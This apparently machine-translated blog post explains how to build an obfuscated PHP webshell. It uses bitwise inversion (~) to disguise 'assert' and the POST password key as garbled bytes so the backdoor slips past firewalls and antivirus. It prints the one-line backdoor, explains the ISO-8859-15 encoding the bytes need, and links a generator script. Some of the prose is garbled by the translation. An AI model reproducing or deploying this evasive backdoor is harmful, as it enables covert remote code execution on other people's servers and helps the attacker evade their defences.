Use bitwise inversion in PHP (~) Function creation backdoor, code variant Backdoor

Use bitwise inversion in PHP (~) Function creation backdoor, code variant Backdoor

1) PHP ~ Bitwise operators

Some time ago, a foreigner posted an interesting things on twitter. After accessing a string suspected of garbled characters, it could normally output 1337.

PHP: bitwise operator-http://www.php.net/manual/zh/language.operators.bitwise.php

~ $ ANot (bitwise inversion) sets the bitwise 0 in $ a

1, and vice versa.

 

PHP ini sets error_reporting to use a bitwise value, providing a real example of disabling a bit. All errors except the prompt level should be displayed.

Php. ini is used in this way: E_ALL &~ E_NOTICE

The specific operation method is to first obtain the value of E_ALL: 00000000000000000111011111111111

Then get the value of E_NOTICE: 00000000000000000000000000001000

Then pass ~ Reversed: 11111111111111111111111111110111

Finally, we use the bitwise AND (&) to get the BIT (1) set in both values: 00000000000000000111011111110111

2) analysis and Reproduction

This is the original code implementation effect at that time:

 

When you see this effect, the first thing you think of is to bypass the implementation of backdoors such as firewalls, and then start to consider which encoding method is used?

Later, I used echo directly in the test with Li pujun ~ '1'; and so on, the above 'garbled 'will be directly output '.

 

Then we can start writing a sentence to try the effect:

<? Php $ x = ~ Ÿ ¬ ° «; $ x ($ _ POST [~ ¹ Ï]);?>

Here, the $ x variable is defined as ASSERT, And the password is FF0000, which can be directly linked to the backdoor, because when the bit is reversed out of 'garbled ', we can take another reverse to return the normal value.

3) coding and kill-free

When I reproduce this backdoor, I found that the direct Copy over HTTP status 500, the source is the encoding problem, the above 'garbled 'is actually Western Europe (ISO-8859-15 ).

In the actual process, we have encountered many Backdoors that cannot be linked. The Error 500 is returned because of encoding problems. If the default encoding cannot be identified, save the encoding method as this (GBK \ UTF8 \... cannot be used successfully)

 

 

4) stay at the end

We wrote a small script for easy generation: http://www.bkjia.com/tools/Createbackdoor-1.php

 

How to Use: Createbackdoor-1.php? Pwd = password